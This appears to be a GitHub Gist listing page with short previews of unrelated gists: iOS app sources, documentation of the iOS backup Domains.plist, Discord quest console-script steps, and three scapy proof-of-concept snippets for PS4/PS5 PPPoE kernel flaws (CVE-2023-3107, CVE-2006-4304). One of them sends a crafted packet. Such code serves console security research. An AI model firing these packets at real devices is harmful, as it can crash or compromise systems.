- Visit fmhy.net/android-iosguide#ios-ipas for more sources.
- Sideloading Guide: https://rentry.co/sideloadingguide
ongkiii
/ IPA-Sources.md
Last active
October 19, 2025 03:56
REPOS/TELEGRAM CHANNELS LIST BY u/angkitbharadwaj
leminlimez
/ Domains.md
Last active
October 9, 2025 03:29
A deep dive into the iOS backup/restore system
Documentation of /System/Library/Backup/Domains.plist. File taken from iOS 16.4 iPhone SE 3. The file was removed in iOS 17.0
Values in the plist. Other than SystemDomains, these are not really important and are just here for preservation sake.
A domain in domains.plist contains keys that determine what gets backed up for what types of devices and where (i.e. iCloud vs iTunes). Not all domains have each key. The only 2 keys that must be in every domain are RootPath and RelativePathsToBackupAndRestore. Some domains have the value ShouldDigest. I am not sure exactly what it means but I have included it for documentation purposes.
Version:"24.0"SystemDomains:(Dictionary), see below
Note
This does not works in browser for quests which require you to play a game! Use the desktop app to complete those.
How to use this script:
- Accept a quest under Discover -> Quests
- Press Ctrl+Shift+I to open DevTools
- Go to the
Consoletab - Paste the following code and hit enter:
lewiwiii
/ PoC of CVE-2023-3107 for PS4.py
Last active
April 10, 2024 10:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This software is licensed under the GNU Affero General Public License (AGPL) version 3.0 or later. | |
| # For more details, see <https://www.gnu.org/licenses/agpl-3.0.html>. | |
| from scapy import all as sp | |
| import sys | |
| import random as rn | |
| iface = sys.argv[1] | |
| src_mac = sp.get_if_hwaddr(iface) |
iMrDJAi
/ CVE-2006-4304.py
Last active
July 16, 2025 01:15
My implementation of a proof of concept for the `CVE-2006-4304` sppp driver vulnerability that affected PS4/PS5 and earlier versions of FreeBSD/NetBSD
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import sniff, sendp | |
| from socket import * | |
| import time | |
| # Replace with your PS4/5's MAC address. | |
| dst_mac=b'\xaa\xbb\xcc\xdd\xee\xff' | |
| # Replacing source MAC address is not mandatory | |
| src_mac= b'\xab\xcd\xef\xab\xcd\xef' | |
| # Replace this with your computer's ethernet interface name | |
| iface_name = 'Ethernet' |
RobbedColek
/ PS4-PS5-CVE-2006-4304.py
Created
January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump | |
| source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC | |
| destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4 | |
| interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux | |
| packet = sniff(iface=interface, filter="pppoed", count=1) | |
| tag_value = packet[PPPoED][0].tag_list[1].tag_value | |
| payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value | |
| sendp(payload, iface=interface) |